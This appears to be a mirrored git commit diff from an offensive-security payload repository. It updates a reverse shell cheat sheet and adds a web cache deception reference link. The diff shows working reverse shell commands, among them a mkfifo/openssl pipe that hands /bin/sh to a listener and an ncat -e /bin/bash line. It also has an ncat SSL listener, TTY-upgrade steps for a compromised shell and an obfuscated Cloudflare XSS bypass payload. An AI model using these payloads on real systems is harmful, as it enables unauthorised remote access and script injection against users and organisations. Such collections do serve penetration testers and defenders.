mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 13:25:27 +00:00
Web cache deception resources update
This commit is contained in:
parent
70225232c9
commit
6d2cd684fa
@ -102,6 +102,8 @@ ncat --udp 127.0.0.1 4444 -e /bin/bash
|
|||||||
```powershell
|
```powershell
|
||||||
hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||||
hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
|
hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
|
||||||
|
or
|
||||||
|
hacker@kali$ ncat --ssl -vv -l -p 4242
|
||||||
|
|
||||||
user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
|
user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
|
||||||
```
|
```
|
||||||
@ -204,12 +206,10 @@ Access shortcuts, su, nano and autocomplete in a partially tty shell
|
|||||||
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# in host
|
|
||||||
ctrl+z
|
ctrl+z
|
||||||
|
echo $TERM && tput lines && tput cols
|
||||||
stty raw -echo
|
stty raw -echo
|
||||||
fg
|
fg
|
||||||
|
|
||||||
# in reverse shell
|
|
||||||
reset
|
reset
|
||||||
export SHELL=bash
|
export SHELL=bash
|
||||||
export TERM=xterm-256color
|
export TERM=xterm-256color
|
||||||
|
@ -55,3 +55,4 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
|
|||||||
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
|
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
|
||||||
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
|
||||||
* [Web Caching - SI9INT](https://si9int.sh/article/6)
|
* [Web Caching - SI9INT](https://si9int.sh/article/6)
|
||||||
|
* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
|
@ -817,6 +817,12 @@ Works for CSP like `script-src self`
|
|||||||
|
|
||||||
## Common WAF Bypass
|
## Common WAF Bypass
|
||||||
|
|
||||||
|
### Cloudflare XSS Bypass - 27th february 2018
|
||||||
|
|
||||||
|
```html
|
||||||
|
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
|
||||||
|
```
|
||||||
|
|
||||||
### Chrome Auditor - 9th august 2018
|
### Chrome Auditor - 9th august 2018
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
Loading…
Reference in New Issue
Block a user